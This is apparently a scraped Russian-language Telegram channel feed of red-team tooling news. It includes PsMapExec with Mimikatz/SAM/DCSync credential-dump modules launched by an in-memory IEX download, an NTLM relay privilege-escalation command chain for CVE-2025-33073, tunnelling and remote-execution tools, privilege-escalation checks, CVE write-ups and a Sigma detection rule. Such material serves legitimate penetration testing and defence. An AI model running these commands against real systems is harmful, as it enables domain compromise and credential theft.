Инструмент для различных манипуляций с токенами, байпасит KES, Defender, etc
#windows #token #impersonate
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8
Вышло большое обновление отличного инструмента пост эксплуатации в
UPD. 0.9.0
Поддержка нескольких доменов
Улучшена работа через Proxifier / SSH туннели
Возможность включить/выключить RDP
Новые модули:
EventCreds
Дополнительные модули в LDAP:
GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDescriptions
UserLogonRestrictions
UserPasswords
UserSIDs
Текущая поддержка методов (протоколов):
🔵 RDP🔵 SessionHunter🔵 SMB🔵 SMB Signing🔵 LDAP / LDAPS🔵 SSH🔵 Spraying🔵 VNC🔵 WinRM🔵 WMI🔵 MSSQL🔵 Kerberoast
Реализованные модули:
🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов🔵 ConsoleHistory - история в PowerShell🔵 Files - файлы в типичных директориях🔵 KerbDump - дамп Kerberos билетов🔵 eKeys - дамп ключей (Mimikatz)🔵 LogonPasswords - дамп logon passwords (Mimikatz)🔵 LSA - дамп LSA (Mimikatz)🔵 NTDS - реализация DCsync🔵 SAM - дамп SAM
Запуск из памяти:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]
# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
#soft #pentest #powershell #psmapexec #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
wiz.io
Wiz Finds Critical Redis RCE Vulnerability: CVE‑2025‑49844 | Wiz Blog
A 13‑year Redis flaw (CVE‑2025‑49844) allows attackers to escape Lua sandbox and run code on hosts. See Wiz Research’s analysis and mitigations.
The vulnerability exploits a Use-After-Free (UAF) memory corruption bug that has existed for approximately 13 years in the Redis source code
CVSS Score: 10.0
Флоу уязвимости:
Коннект до Redis
Отправка вредоносного Lua скрипта через Eval
Триггерим Use-After-Free
Выход из Lua песочницы
Выполнение кода за пределами песочницы
Получаем полный доступ
Уязвимые версии до:
Redis 8.2.2
Redis 8.0.4
Redis 7.4.6
Redis 7.2.11
#cve #poc #redis
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2 1
Remco van der Meer
Automating MS-RPC vulnerability research
Diving into the MS-RPC protocol and how to automate vulnerability research using a fuzzing approach.
Gain insights into MS-RPC implementations that may be vulnerable using an automated approach and make it easy to visualize the data
Использование:
Import-Module .\MS-RPC-Fuzzer.psm1
Get-RpcServerData -target "C:\Windows\System32\efssvc.dll" -OutPath .\output
#Fuzzing
'.\output\rpcServerData.json' | Invoke-RpcFuzzer -outpath .\output\ -minStrLen 100 -maxStrLen 1000 -minIntSize 9999 -maxIntSize 99999
#Analysis
'.\output\Allowed.json' | Import-DatatoNeo4j -Neo4jHost 192.168.178.89:7474 -Neo4jUsername neo4j
#rpc #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
TCP туннель через файл
Bypassing a firewall:
# Host A
ft.exe -L 5000:127.0.0.1:3389 --write "\\server\share\1.dat" --read "\\server\share\2.dat"
# Host B
ft.exe --read "\\server\share\1.dat" --write "\\server\share\2.dat"
Tunnel TCP through RDP:
# Host A
ft.exe -L 5000:192.168.1.50:8888 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"
# Host B
ft.exe --read "\\tsclient\c\Temp\1.dat" --write "\\tsclient\c\Temp\2.dat"
#windows #filetunnel
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯4🔥3
Forwarded from ZeroNights
Осталось всего 3️⃣ часа до старта нашего традиционного хакерского квеста HackQuest!
🟢 HackQuest будет длиться неделю — до 20:00 (МСК) часов 24 октября
🟢 Каждый день в 20:00 (МСК) будет открываться новое задание, на решение которого отводится 24 часа
🟢 Лучшие игроки получат инвайт на конференцию ZeroNights 2025!
Правила участия подробно по ссылке.
🟩 Принять участие в HackQuest: hackquest.zeronights.org 🟩
Правила участия подробно по ссылке.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
UPD v0.3.0
Инструмент для удаленного выполнения команд в
Возможность kerberos аутентификации, pth, pfx сертификату
scmr - Service Control Manager (MS-SCMR)
tsch - Task Scheduler (MS-TSCH)
dcom - Distributed Component Object Model (MS-DCOM)
wmi - Windows Management Instrumentation (MS-WMI)
Установка:
CGO_ENABLED=0 go install -ldflags="-s -w" github.com/FalconOpsLLC/goexec@latest
#goexec #redteam #soft #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5 3 1
Напомню про один из лучших
Вот и шпаргалка к нему
Установка в
curl -LsSf https://astral.sh/uv/install.sh | sh
Установка в
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"
#python #uvx #venv #uv
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2 1
Forwarded from 1N73LL1G3NC3
After Microsoft patched Yuval Gordon’s BadSuccessor privilege escalation technique, BadSuccessor returned with another blog from Yuval, briefly mentioning to the community that attackers can still abuse dMSAs to take over any object where we have a write primitive. This mention did not gather significant attention from the community, leaving an operational gap for dMSA related tooling and attention. This blog dives into why dMSA abuse is still a problem, the release of a new Beacon object file (BOF) labeled BadTakeover, plus additions to SharpSuccessor, all to show that BadSuccessor’s impact as a technique (not a vulnerability) will still hold a lasting effect.
Beacon Object File (BOF) for Using the BadSuccessor Technique for Account Takeover
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1
GitHub
GitHub - aritlhq/CVE-2025-11391: WordPress PPOM for WooCommerce Plugin <= 33.0.15 is vulnerable to SQL Injection
WordPress PPOM for WooCommerce Plugin <= 33.0.15 is vulnerable to SQL Injection - aritlhq/CVE-2025-11391
Детали:
Plugin: PPOM for WooCommerce
Affected Versions: <= 33.0.15
Patched Version: 33.0.16
Vulnerability Type: Unauthenticated Time-Based Blind SQL Injection
CVE ID: CVE-2025-11391
Уязвимый код (classes/plugin.class.php):
function get_product_meta( $meta_id ) {
// ...
global $wpdb;
$qry = 'SELECT * FROM ' . $wpdb->prefix . PPOM_TABLE_META . " WHERE productmeta_id = $meta_id";
$res = $wpdb->get_row( $qry );
return $res;
}#cve #wordpress #sqli
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент для аудита разрешений в
доступом (ACL – Access Control List)
Написан на
SACL - список используемый для аудита доступа к данному объекту.
DACL - список указывающий права пользователей и групп на действия с данным объектом.
Разрешения, которые нам интересны:
GenericAll - полные права на объект
GenericWrite - редактировать атрибуты объекта
WriteOwner - изменить владельца объекта
WriteDACL - редактировать ACE объекта
AllExtendedRights - расширенные права на объект
ForceChangePassword - сменить пароль объекта
Self - возможность добавить себя в группу
Работает в GUI или консольном режимах:
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/canix1/ADACLScanner/refs/heads/master/ADACLScan.ps1' -OutFile ADACLScan.ps1
.\ADACLScan.ps1
.\ADACLScan.ps1 -Base (Get-ADRootDSE).defaultNamingContext -Owner -Scope subtree -Filter '(objectClass=*)' | Where-Object {$_.Access -eq 'Owner'}
Экспорт в xls, csv, html
Большое количество возможностей
#acl #windows #powershell #redteam #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤2 1
FuzzForge helps security researchers and engineers automate application security and offensive security workflows with the power of AI and fuzzing frameworks
Установка:
git clone https://github.com/fuzzinglabs/fuzzforge_ai.git
cd fuzzforge_ai
uv tool install --python python3.12 .
Сервисы:
Temporal: Workflow orchestration (UI at https://localhost:8080)
MinIO: File storage for targets (Console at https://localhost:9001)
Backend API: FuzzForge REST API (https://localhost:8000)
#ai #appsec #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥1 1 1
Hawktrace
CVE-2025-59287 WSUS Remote Code Execution
A technical WSUS advisory for CVE-2025-59287: unsafe deserialization in Windows Server Update Services that allows remote code execution.
Критическая уязвимость удалённого выполнения кода (RCE) в службе обновлений Windows Server (WSUS) от
Уязвимость позволяет не аутентифицированному пользователю осуществить удалённое выполнение кода с привилегиями уровня SYSTEM путём отправки вредоносных зашифрованных cookie
Оценка по CVSS - 9,8
Причина:
Небезопасная десериализация данных AuthorizationCookie посредством BinaryFormatter в методе EncryptionHelper.DecryptData()
Для исправления поставить патч:
23 октября 2025 года выпущено внеплановое (OOB) обновление, устраняющее данную проблему. Это накопительное обновление, поэтому перед его установкой не требуется применять предыдущие обновления — оно заменяет все ранее выпущенные исправления для затронутых версий. Если вы еще не установили октябрьское обновление безопасности Windows 2025, мы рекомендуем установить именно это внеплановое обновление
#wsus #cve #poc #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🤔3
Платформа с открытым исходным кодом для обмена, оценки, улучшения и управления правилами обнаружения (YARA, Sigma, Suricata и др.) с поддержкой API
Форматы:
Yara
Sigma
Zeek
Suricata
Crs
Nova
Elastic
Пример:
title: Encoded or Base64 Payload in HTTP POST to F5 Management API
id: f5-base64-upload-2025
description: Detects long base64 strings in HTTP POST body to management or shared endpoints.
author: [email protected]
status: experimental
logsource:
product: webproxy
service: http
detection:
selection:
http.method: POST
url|contains:
- '/mgmt'
- '/shared'
http.request.body|contains_regexp: '[A-Za-z0-9+/]{200,}={0,2}'
condition: selection
level: medium
falsepositives:
- Legitimate encoded payloads (token exchanges, APIs).
#ti #rules #detection #soc #api
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤2😭1 1
Forwarded from RedTeam brazzers (Миша)
Всем привет!
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
Скрипт для сбора полезной информации и проверки возможности повышения привилегий
Запуск:
iwr https://github.com/itm4n/PrivescCheck/releases/latest/download/PrivescCheck.ps1 -OutFile PrivescCheck.ps1
#Базовые проверки
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
#Расширенные
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Audit -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML,CSV,XML"
#privesccheck #windows #powershell #lpe
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2